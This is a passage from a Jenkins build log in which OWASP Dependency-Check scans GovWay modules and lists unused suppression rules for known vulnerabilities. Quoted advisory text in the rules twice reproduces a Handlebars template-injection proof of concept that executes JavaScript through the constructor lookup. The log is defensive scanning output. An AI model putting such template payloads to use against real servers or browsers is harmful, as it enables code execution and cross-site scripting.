17:42:07 Upgrade to version 3.0.8, 4.5.2 or later., regex=false, caseSensitive=false},}} 17:42:07 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.3 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It is due to an incomplete fix for a [previous issue](https://www.npmjs.com/advisories/1316). This vulnerability can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting), regex=false, caseSensitive=false},}} 17:42:07 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 162, regex=false, caseSensitive=false},}} 17:42:07 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 11974, regex=false, caseSensitive=false},}} 17:42:07 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/xerces/xercesImpl@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=CVE-2017-10355, regex=false, caseSensitive=false},}} 17:42:07 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-core@.*$, regex=true, caseSensitive=false},cve={CVE-2025-48976,}} 17:42:07 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-jakarta@.*$, regex=true, caseSensitive=false},cpe={PropertyType{value=cpe:/a:apache:commons_fileupload, regex=false, caseSensitive=false},}} 17:42:07 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2025-15599,}} 17:42:07 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2026-0540,}} 17:42:07 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:42:07 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox-io@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:42:07 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2016-2175,}} 17:42:07 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-8036,}} 17:42:07 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-11797,}} 17:42:07 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:42:07 [INFO] Analysis Complete (1 seconds) 17:42:07 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.xml 17:42:07 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.html 17:42:07 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.json 17:42:07 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.csv 17:42:07 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.sarif 17:42:07 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-jenkins.html 17:42:07 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-junit.xml 17:42:07 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-gitlab.json 17:42:07 [INFO] 17:42:07 [INFO] --------------< org.openspcoop2:org.openspcoop2.reports >--------------- 17:42:07 [INFO] Building dependencies.reports 1.0 [24/67] 17:42:07 [INFO] from mvn/dependencies/reports/pom.xml 17:42:07 [INFO] --------------------------------[ pom ]--------------------------------- 17:42:07 [INFO] 17:42:07 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.reports --- 17:42:07 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/reports (includes = [*.jar], excludes = []) 17:42:07 [INFO] 17:42:07 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.reports --- 17:42:07 [INFO] 17:42:07 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.reports --- 17:42:07 [INFO] Executing tasks 17:42:12 [INFO] Executed tasks 17:42:12 [INFO] 17:42:12 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.reports --- 17:42:12 [INFO] Checking for updates 17:42:12 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:42:12 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:42:12 [INFO] Check for updates complete (70 ms) 17:42:12 [INFO] 17:42:12 17:42:12 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:42:12 17:42:12 17:42:12 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:42:12 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:42:12 17:42:12 17:42:12 [INFO] Analysis Started 17:42:12 [INFO] Finished Archive Analyzer (0 seconds) 17:42:12 [INFO] Finished File Name Analyzer (0 seconds) 17:42:12 [INFO] Finished Jar Analyzer (0 seconds) 17:42:12 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:42:12 [INFO] Finished Hint Analyzer (0 seconds) 17:42:12 [INFO] Finished Version Filter Analyzer (0 seconds) 17:42:14 [INFO] Created CPE Index (1 seconds) 17:42:14 [INFO] Finished CPE Analyzer (1 seconds) 17:42:14 [INFO] Finished False Positive Analyzer (0 seconds) 17:42:14 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:42:14 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:42:14 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:42:14 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:42:14 [INFO] Suppression Rule had zero matches: SuppressionRule{filePath=PropertyType{value=.*swagger-codegen-cli-3.0.46-gov4j-1.jar.*, regex=true, caseSensitive=false},cvssBelow={10.0,}} 17:42:14 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=A prototype pollution vulnerability in handlebars is exploitable if an attacker can control the template, regex=false, caseSensitive=false},}} 17:42:14 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Denial of service, regex=false, caseSensitive=false},}} 17:42:14 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Prototype pollution, regex=false, caseSensitive=false},}} 17:42:14 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Disallow calling helperMissing and blockHelperMissing directly, regex=false, caseSensitive=false},}} 17:42:14 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1495, regex=false, caseSensitive=false},}} 17:42:14 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1633, regex=false, caseSensitive=false},}} 17:42:14 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Affected versions of `handlebars` are vulnerable to Denial of Service. The package's parser may be forced into an endless loop while processing specially-crafted templates. This may allow attackers to exhaust system resources leading to Denial of Service. 17:42:14 17:42:14 17:42:14 ## Recommendation 17:42:14 17:42:14 Upgrade to version 4.4.5 or later., regex=false, caseSensitive=false},}} 17:42:14 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jQuery 1.x and 2.x are End-of-Life and no longer receiving security updates, regex=false, caseSensitive=false},}} 17:42:14 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.2 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting). 17:42:14 17:42:14 The following template can be used to demonstrate the vulnerability: 17:42:14 ```{{#with "constructor"}} 17:42:14 {{#with split as |a|}} 17:42:14 {{pop (push "alert('Vulnerable Handlebars JS');")}} 17:42:14 {{#with (concat (lookup join (slice 0 1)))}} 17:42:14 {{#each (slice 2 3)}} 17:42:14 {{#with (apply 0 a)}} 17:42:14 {{.}} 17:42:14 {{/with}} 17:42:14 {{/each}} 17:42:14 {{/with}} 17:42:14 {{/with}} 17:42:14 {{/with}}``` 17:42:14 17:42:14 17:42:14 ## Recommendation 17:42:14 17:42:14 Upgrade to version 3.0.8, 4.5.2 or later., regex=false, caseSensitive=false},}} 17:42:14 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.3 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It is due to an incomplete fix for a [previous issue](https://www.npmjs.com/advisories/1316). This vulnerability can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting), regex=false, caseSensitive=false},}} 17:42:14 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 162, regex=false, caseSensitive=false},}} 17:42:14 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 11974, regex=false, caseSensitive=false},}} 17:42:14 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/xerces/xercesImpl@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=CVE-2017-10355, regex=false, caseSensitive=false},}} 17:42:14 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-core@.*$, regex=true, caseSensitive=false},cve={CVE-2025-48976,}} 17:42:14 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-jakarta@.*$, regex=true, caseSensitive=false},cpe={PropertyType{value=cpe:/a:apache:commons_fileupload, regex=false, caseSensitive=false},}} 17:42:14 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2025-15599,}} 17:42:14 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2026-0540,}} 17:42:14 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:42:14 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox-io@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:42:14 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2016-2175,}} 17:42:14 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-8036,}} 17:42:14 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-11797,}} 17:42:14 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:42:14 [INFO] Analysis Complete (1 seconds) 17:42:14 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.xml 17:42:14 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.html 17:42:14 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.json 17:42:14 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.csv 17:42:14 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.sarif 17:42:14 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-jenkins.html 17:42:14 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-junit.xml 17:42:14 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-gitlab.json 17:42:14 [INFO] 17:42:14 [INFO] ----------------< org.openspcoop2:org.openspcoop2.saaj >---------------- 17:42:14 [INFO] Building dependencies.saaj 1.0 [25/67] 17:42:14 [INFO] from mvn/dependencies/saaj/pom.xml 17:42:14 [INFO] --------------------------------[ pom ]--------------------------------- 17:42:14 [INFO] 17:42:14 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.saaj --- 17:42:14 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/saaj (includes = [*.jar], excludes = []) 17:42:14 [INFO] 17:42:14 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.saaj --- 17:42:14 [INFO] 17:42:14 [INFO] --- antrun:3.1.0:run (delete-dependencies-override-gov4j) @ org.openspcoop2.saaj --- 17:42:14 [INFO] Executing tasks 17:42:14 [INFO] [delete] Deleting: /var/lib/jenkins/workspace/GovWay/lib/saaj/saaj-impl-3.0.4.jar 17:42:14 [INFO] Executed tasks 17:42:14 [INFO] 17:42:14 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.saaj --- 17:42:14 [INFO] Executing tasks 17:42:19 [INFO] Executed tasks 17:42:19 [INFO] 17:42:19 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.saaj --- 17:42:19 [INFO] Checking for updates 17:42:19 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:42:19 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:42:19 [INFO] Check for updates complete (77 ms) 17:42:19 [INFO] 17:42:19 17:42:19 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:42:19 17:42:19 17:42:19 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:42:19 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:42:19 17:42:19 17:42:19 [INFO] Analysis Started 17:42:20 [INFO] Finished Archive Analyzer (0 seconds) 17:42:20 [INFO] Finished File Name Analyzer (0 seconds) 17:42:20 [INFO] Finished Jar Analyzer (0 seconds) 17:42:20 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:42:20 [INFO] Finished Hint Analyzer (0 seconds) 17:42:20 [INFO] Finished Version Filter Analyzer (0 seconds) 17:42:21 [INFO] Created CPE Index (1 seconds) 17:42:21 [INFO] Finished CPE Analyzer (1 seconds) 17:42:21 [INFO] Finished False Positive Analyzer (0 seconds) 17:42:21 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:42:21 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:42:21 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:42:21 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:42:21 [INFO] Suppression Rule had zero matches: SuppressionRule{filePath=PropertyType{value=.*swagger-codegen-cli-3.0.46-gov4j-1.jar.*, regex=true, caseSensitive=false},cvssBelow={10.0,}} 17:42:21 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=A prototype pollution vulnerability in handlebars is exploitable if an attacker can control the template, regex=false, caseSensitive=false},}} 17:42:21 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Denial of service, regex=false, caseSensitive=false},}} 17:42:21 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Prototype pollution, regex=false, caseSensitive=false},}} 17:42:21 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Disallow calling helperMissing and blockHelperMissing directly, regex=false, caseSensitive=false},}} 17:42:21 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1495, regex=false, caseSensitive=false},}} 17:42:21 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=handlebars issue: 1633, regex=false, caseSensitive=false},}} 17:42:21 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Affected versions of `handlebars` are vulnerable to Denial of Service. The package's parser may be forced into an endless loop while processing specially-crafted templates. This may allow attackers to exhaust system resources leading to Denial of Service. 17:42:21 17:42:21 17:42:21 ## Recommendation 17:42:21 17:42:21 Upgrade to version 4.4.5 or later., regex=false, caseSensitive=false},}} 17:42:21 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jQuery 1.x and 2.x are End-of-Life and no longer receiving security updates, regex=false, caseSensitive=false},}} 17:42:21 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.2 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting). 17:42:21 17:42:21 The following template can be used to demonstrate the vulnerability: 17:42:21 ```{{#with "constructor"}} 17:42:21 {{#with split as |a|}} 17:42:21 {{pop (push "alert('Vulnerable Handlebars JS');")}} 17:42:21 {{#with (concat (lookup join (slice 0 1)))}} 17:42:21 {{#each (slice 2 3)}} 17:42:21 {{#with (apply 0 a)}} 17:42:21 {{.}} 17:42:21 {{/with}} 17:42:21 {{/each}} 17:42:21 {{/with}} 17:42:21 {{/with}} 17:42:21 {{/with}}``` 17:42:21 17:42:21 17:42:21 ## Recommendation 17:42:21 17:42:21 Upgrade to version 3.0.8, 4.5.2 or later., regex=false, caseSensitive=false},}} 17:42:21 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Versions of `handlebars` prior to 3.0.8 or 4.5.3 are vulnerable to Arbitrary Code Execution. The package's lookup helper fails to properly validate templates, allowing attackers to submit templates that execute arbitrary JavaScript in the system. It is due to an incomplete fix for a [previous issue](https://www.npmjs.com/advisories/1316). This vulnerability can be used to run arbitrary code in a server processing Handlebars templates or on a victim's browser (effectively serving as Cross-Site Scripting), regex=false, caseSensitive=false},}} 17:42:21 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 162, regex=false, caseSensitive=false},}} 17:42:21 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/jquery@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=jquery issue: 11974, regex=false, caseSensitive=false},}} 17:42:21 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/xerces/xercesImpl@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=CVE-2017-10355, regex=false, caseSensitive=false},}} 17:42:21 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-core@.*$, regex=true, caseSensitive=false},cve={CVE-2025-48976,}} 17:42:21 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.commons/commons-fileupload2-jakarta@.*$, regex=true, caseSensitive=false},cpe={PropertyType{value=cpe:/a:apache:commons_fileupload, regex=false, caseSensitive=false},}} 17:42:21 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2025-15599,}} 17:42:21 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/DOMPurify@.*$, regex=true, caseSensitive=false},cve={CVE-2026-0540,}} 17:42:21 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:42:21 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/org\.apache\.pdfbox/pdfbox-io@.*$, regex=true, caseSensitive=false},cve={CVE-2026-23907,}} 17:42:21 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2016-2175,}} 17:42:21 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-8036,}} 17:42:21 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:maven/com\.github\.dhorions/boxable@.*$, regex=true, caseSensitive=false},cve={CVE-2018-11797,}} 17:42:21 [INFO] Finished Unused Suppression Rule Analyzer (0 seconds) 17:42:21 [INFO] Analysis Complete (1 seconds) 17:42:21 [INFO] Writing XML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.xml 17:42:21 [INFO] Writing HTML report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.html 17:42:21 [INFO] Writing JSON report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.json 17:42:21 [INFO] Writing CSV report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.csv 17:42:21 [INFO] Writing SARIF report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-report.sarif 17:42:21 [INFO] Writing JENKINS report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-jenkins.html 17:42:21 [INFO] Writing JUNIT report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-junit.xml 17:42:21 [INFO] Writing GITLAB report to: /var/lib/jenkins/workspace/GovWay/mvn/dependency-check-result/dependency-check-gitlab.json 17:42:21 [INFO] 17:42:21 [INFO] --------------< org.openspcoop2:org.openspcoop2.security >-------------- 17:42:21 [INFO] Building dependencies.security 1.0 [26/67] 17:42:21 [INFO] from mvn/dependencies/security/pom.xml 17:42:21 [INFO] --------------------------------[ pom ]--------------------------------- 17:42:21 [INFO] 17:42:21 [INFO] --- clean:3.4.0:clean (clean) @ org.openspcoop2.security --- 17:42:21 [INFO] Deleting /var/lib/jenkins/workspace/GovWay/lib/security (includes = [*.jar], excludes = []) 17:42:21 [INFO] 17:42:21 [INFO] --- dependency:3.8.1:copy-dependencies (copy-dependencies) @ org.openspcoop2.security --- 17:42:21 [INFO] 17:42:21 [INFO] --- antrun:3.1.0:run (sleep-for-a-while) @ org.openspcoop2.security --- 17:42:21 [INFO] Executing tasks 17:42:26 [INFO] Executed tasks 17:42:26 [INFO] 17:42:26 [INFO] --- dependency-check:12.2.0:aggregate (check owasp) @ org.openspcoop2.security --- 17:42:26 [INFO] Checking for updates 17:42:26 [INFO] Skipping the NVD API Update as it was completed within the last 240 minutes 17:42:26 [INFO] Skipping Known Exploited Vulnerabilities update check since last check was within 24 hours. 17:42:26 [INFO] Check for updates complete (72 ms) 17:42:27 [INFO] 17:42:27 17:42:27 Dependency-Check is an open source tool performing a best effort analysis of 3rd party dependencies; false positives and false negatives may exist in the analysis performed by the tool. Use of the tool and the reporting provided constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to the analysis or its use. Any use of the tool and the reporting provided is at the user's risk. In no event shall the copyright holder or OWASP be held liable for any damages whatsoever arising out of or in connection with the use of this tool, the analysis performed, or the resulting report. 17:42:27 17:42:27 17:42:27 About ODC: https://dependency-check.github.io/DependencyCheck/general/internals.html 17:42:27 False Positives: https://dependency-check.github.io/DependencyCheck/general/suppression.html 17:42:27 17:42:27 17:42:27 [INFO] Analysis Started 17:42:27 [INFO] Finished Archive Analyzer (0 seconds) 17:42:27 [INFO] Finished File Name Analyzer (0 seconds) 17:42:27 [INFO] Finished Jar Analyzer (0 seconds) 17:42:27 [INFO] Finished Dependency Merging Analyzer (0 seconds) 17:42:27 [INFO] Finished Hint Analyzer (0 seconds) 17:42:27 [INFO] Finished Version Filter Analyzer (0 seconds) 17:42:29 [INFO] Created CPE Index (1 seconds) 17:42:29 [INFO] Finished CPE Analyzer (1 seconds) 17:42:29 [INFO] Finished False Positive Analyzer (0 seconds) 17:42:29 [INFO] Finished NVD CVE Analyzer (0 seconds) 17:42:29 [INFO] Finished Vulnerability Suppression Analyzer (0 seconds) 17:42:29 [INFO] Finished Known Exploited Vulnerability Analyzer (0 seconds) 17:42:29 [INFO] Finished Dependency Bundling Analyzer (0 seconds) 17:42:29 [INFO] Suppression Rule had zero matches: SuppressionRule{filePath=PropertyType{value=.*swagger-codegen-cli-3.0.46-gov4j-1.jar.*, regex=true, caseSensitive=false},cvssBelow={10.0,}} 17:42:29 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=A prototype pollution vulnerability in handlebars is exploitable if an attacker can control the template, regex=false, caseSensitive=false},}} 17:42:29 [INFO] Suppression Rule had zero matches: SuppressionRule{packageUrl=PropertyType{value=^pkg:javascript/handlebars@.*$, regex=true, caseSensitive=false},vulnerabilityName={PropertyType{value=Denial of service, regex=false, caseSensitive=false},}} 17:42:29 [INFO] Suppression Rule had zero matches: 